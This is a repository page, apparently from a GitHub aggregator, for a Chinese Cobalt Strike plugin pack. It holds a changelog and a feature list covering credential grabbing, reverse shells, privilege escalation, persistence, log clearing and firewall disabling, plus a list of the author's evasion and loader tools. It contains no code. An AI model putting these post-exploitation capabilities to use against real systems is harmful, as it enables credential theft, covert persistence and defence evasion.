• Stars
    star
    664
  • Rank 67,903 (Top 2 %)
  • Language
    C
  • Created about 5 years ago
  • Updated about 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Cobalt Strike Aggressor 插件包

Cobalt-Strike-Aggressor-Scripts

Cobalt-Strike-Aggressor-Scripts

长时间未更新,说声抱歉

本脚本借鉴了许多大佬的思路以及源码,由于较为仓促未能贴出每个的url,在此表示感谢!

Usage: https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts/wiki

Update 20200422

加入Info-Collect信息收集模块

加入chrome密码获取

Update 20200317

加入spawn as wnf

Update 20200226

加入navicat decrypt

修改程序解决了winscp抓明文漏掉最后一位的问题

Update 20191231

加入新的本地提权方式

Update 20191220

fix bug,修复插件冲突。

Update 20191219

mshta方式反弹shell支持.net4.0方式,更好的适配高版本机器

增加部分应用抓取密码功能(session上右键可看到相关菜单)

Update 20191211

增加nbtscan一键上传,扫描,删除

Update 20191204

增加持久化自启动方式

initial beacon自动设置10秒20%jitter sleep

增加两种提权exploit

增加sleep 带jitter设置

增加session回连自动添加系统版本号于note中

增加RDPthief

增加ps命令用不同颜色标记进程(例如,杀软会被标红)

建议在使用持久化插件时,修改文件内加入注册表的名字以及加入服务的服务名(不修改也可使用)

Cobalt Strike Script Manager中加载Main.cna即可

重构版

重写了cna文件的调用

加入了部分功能

修改了持久化插件

功能:

Access->Elevate增加大部分可用提权exploit

Attacks->Host CACTUSTORCH Payload可添加mshta等反弹方式(需要.net低版本支持)

ps命令标记不同颜色(比如标记出antivirus)

session右键菜单:

MS17-010加入对应payload

Check-VM检查是否为虚拟机(需要powershell支持)

Clear-Event清除日志

FireWall关闭防火墙或者设置对某个exe文件通行

Persistence常用功能之一,多种方式设置持久化,可设置exe文件或者mshta自启

RDP查询rdp对应端口号,开启rdp服务

win2012mimikatz修改注册表,使得2012以上版本可抓到登录密码

CMD批量执行设置的系统命令

sleep with jitter

🚀Star Trend

Stargazers over time

etc

  1. 开源的样本大部分可能已经无法免杀,需要自行修改

  2. 我认为基础核心代码的开源能够帮助想学习的人

  3. 本人从github大佬项目中学到了很多

  4. 若用本人项目去进行:HW演练/红蓝对抗/APT/黑产/恶意行为/违法行为/割韭菜,等行为,本人概不负责,也与本人无关

  5. 本人已不参与大小HW活动的攻击方了,若溯源到timwhite id与本人无关

More Repositories

1

crawlergo_x_XRAY

360/0Kee-Team/crawlergo动态爬虫结合长亭XRAY扫描器的被动扫描功能
Python
1,168
star
2

Doge-Loader

🐶Cobalt Strike Shellcode Loader by Golang
Go
279
star
3

Doge-Gabh

GetProcAddressByHash/remap/full dll unhooking/Tartaru's Gate/Spoofing Gate/universal/Perun's Fart/Spoofing-Gate/EGG/RecycledGate/syswhisper/RefleXXion golang implementation
Go
271
star
4

Doge-XSS-Phishing

xss钓鱼,cna插件配合php后端收杆
JavaScript
266
star
5

rad-xray

xray+rad批量主动扫描
Python
217
star
6

Frog-Auth

🐸Unauthorized Detection Framework未授权访问检测框架
Python
156
star
7

Frog-checkCDN

批量检查目标是否为cdn
Python
133
star
8

Frog-Fp

🐸fingerprint detect framework 批量深度指纹识别框架
Python
114
star
9

Doge-Assembly

Golang evasion tool, execute-assembly .Net file
Go
88
star
10

Frog-Submon

🐸Subdomain Monitor, 子域名监控
Python
75
star
11

Doge-Defense-Evasion-Ref

Defense Evasion & Bypass AntiVirus reference
74
star
12

ReturnGate

ReturnGate, just like HellsGate.
Go
66
star
13

killProcessPOC

use aswArPot.sys to kill process
Go
62
star
14

Doge-MemX

Golang implementation of Reflective load PE from memory
Go
59
star
15

doge-getsys

An easy way to getsystem by golang.
Go
56
star
16

Doge-sRDI

Shellcode implementation of Reflective DLL Injection by Golang. Convert DLLs to position independent shellcode
Go
53
star
17

Doge-Persistence-Platform

后渗透持久化控制平台; Windows Persistence Platform;
45
star
18

Git-Daily

Github Security Daily Repository.
43
star
19

Doge-CSBridge

CS http Dynamic Encrypt Bridge.
Go
42
star
20

Spoofing-Gate

(Hellsgate|Halosgate|Tartarosgate)+Spoofing-Gate. Ensures that all systemcalls go through ntdll.dll
Go
41
star
21

gobusterdns

lite version of gobuster. Only subdomain brute. 内网轻量化子域名爆破工具
Go
40
star
22

Bof2PIC

BOF/COFF obj file to PIC(shellcode). by golang
C
35
star
23

memmod

Fork & modify of Wireguard's Memmod
Go
32
star
24

Doge-CLRLoad

load assembly executable file in memory
Go
30
star
25

Doge-ScreenShot

desktop screenshot
Go
30
star
26

about-anti-honeypot

关于蜜罐的一些微小的统计工作
JavaScript
30
star
27

Doge-AMSI-patch

golang amsi bypass
Go
30
star
28

Doge-DumpMem

dump lsass
Go
30
star
29

Doge-RecycledGate

Golang implementation of Hellsgate + Halosgate/Tartarosgate. Ensures that all systemcalls go through ntdll.dll;
Go
29
star
30

Doge-Hide

windows API to hide console window by golang
Go
28
star
31

Doge-Direct-Syscall

Golang Direct Syscall
Assembly
28
star
32

AddressOfEntryPoint-injection

x64 version
Go
27
star
33

Doge-SelfDelete

Golang implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs
Go
26
star
34

Doge-PX

DPX - the Doge Packer for eXecutables
Go
26
star
35

Doge-Process-Injection

Demo of process injection, using Nt, direct syscall, etc.
Go
26
star
36

ScareCrow-Common

ScareCrow loader binary source which easier to read and learn
Go
25
star
37

iSliver

Learning notes of amazing Sliver C2 project.
Go
24
star
38

Doge-Whisper

golang implementation of Syswhisper2/Syswhisper3
Go
23
star
39

Doge-AliveCheck

Use ICMP requests to check the alive subnet.
Go
23
star
40

Doge-newSyscall

use shellcode as asm function
Go
22
star
41

Doge-EGGCall

Like Hell's Gate but more EGG :)
Go
21
star
42

Doge-BlockDLLs

Preventing 3rd Party DLLs from Injecting into your Malware
Go
21
star
43

CLR-RWX

Load CLR to get RWX 通过加载clr在自身内存中产生rwx空间
Go
21
star
44

Doge-RL

Reflective DLL injection Execution
Go
20
star
45

find-subdomain-by-xray

利用xray高级版批量收集子域名
Python
19
star
46

JmpUnhook

Ntdll Unhooking POC
Go
18
star
47

Doge-AddSSP

Load ssp dll golang implementation
Go
17
star
48

Cobalt-Strike-det

Cobalt Strike teamserver detection.
Python
17
star
49

Doge-HeapAlloc

Go
15
star
50

Doge-Misc

杂 物 收 纳
Go
15
star
51

Freeze-Common

Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
Go
14
star
52

Doge-PX_GUI

DPX工具界面展示
14
star
53

Cafe

程序员在家饮品制作指南。Programmer's guide about how to make drinks at home (Chinese only).
13
star
54

Doge-Persist

Windows Persistence Collection
Go
12
star
55

Etwti-UnhookPOC

Etwti-UnhookPOC just for test
Go
11
star
56

Doge-Unhook

DLL Unhooking
Go
11
star
57

Doge-BadUSB

开源!自主设计的badusb电路板
10
star
58

PyC2-demo

从入门到放弃的产物,学习过程中用python实现的一个单点c2基本功能
Python
10
star
59

sandbox-data-collection

云沙箱数据采集(19年刚学go的远古项目,勿吐槽)
Go
10
star
60

Go-VEH

VEH hook
Go
10
star
61

Divide-Conquer-demo

Divide and Conquer - A technique to bypass NextGen AV
Go
9
star
62

Doge-UnhookEtw

unhook etw by golang
Go
9
star
63

Doge-Obf

golang String Obfuscate
Go
9
star
64

Doge-WhereAmI

Golang implementation of boku7/whereami
Go
8
star
65

ice-strike-design

Ice-Strike C2界面设计分享
8
star
66

Doge-memLDR

memory dll loader
Go
8
star
67

Doge-FindFirewallPorts

Golang implementation of FindFirewallPorts by 清水川崎
Go
7
star
68

Frog-CertDomain

Get CommonName and DNS domains from SSL cert.
Go
7
star
69

Doge-NpThief

Grab unsaved Notepad contents
Go
7
star
70

CVE-2018-8639-EXP

CVE-2018-8639-EXP
6
star
71

Doge-RWXenum

Enumerating RWX Protected Memory Regions.
Go
6
star
72

Doge-OTP

Google Authenticator OTP
Go
6
star
73

Argue-like-Cobalt-Strike

Argue like Cobalt Strike
C++
5
star
74

Doge-hookbypass

C++
5
star
75

Doge-TypeUnhook

type ntdll.dll for dll unhooking
Go
5
star
76

Doge-ReMap

Unhook full dll by Section ReMap
Go
5
star
77

ACG-BOF

Preventing 3rd Party DLLs from Injecting into your Malware
C
5
star
78

fingerprint-scanner-research

开源指纹识别项目调研
5
star
79

Mouse-Control

just for fun
Go
4
star
80

argument-spoofing

argue like Cobalt Strike
4
star
81

VEH-FuncObf

function call Obfuscator using veh hook
C
4
star
82

timwhitez

about me
4
star
83

Doge-ByteBinStr

Byte<->BinaryString convert
Go
4
star
84

powershell-killav

use ps1 to kill some antivirus
PowerShell
3
star
85

v4-v6

ipv4 address maps to ipv6 address
Go
3
star
86

useless-webshell

比小马大比大马小,俗称中马
PHP
3
star
87

BinHol

Binary Hollowing
Go
3
star
88

Sub-Filter

过滤跑出来的子域名
Python
3
star
89

LockWorkStation

Go
2
star
90

str2ntlm

string to ntlm hash string
Go
2
star
91

Garmin-Async

自动化使用dailysync.vyzt.dev定期同步佳明国内与国际版账号
Go
2
star
92

AD-CoT

Advanced Dynamic Chain-of-Thought Framework Prompt
2
star
93

zoomeye-search

导入domain批量zoomeye查询
Python
1
star
94

Sec_MindMap

一些思维导图记录
1
star
95

META-ATT-CK-Framework

A comprehensive matrix of actionable offensive security techniques based on ATT&CK Framework
1
star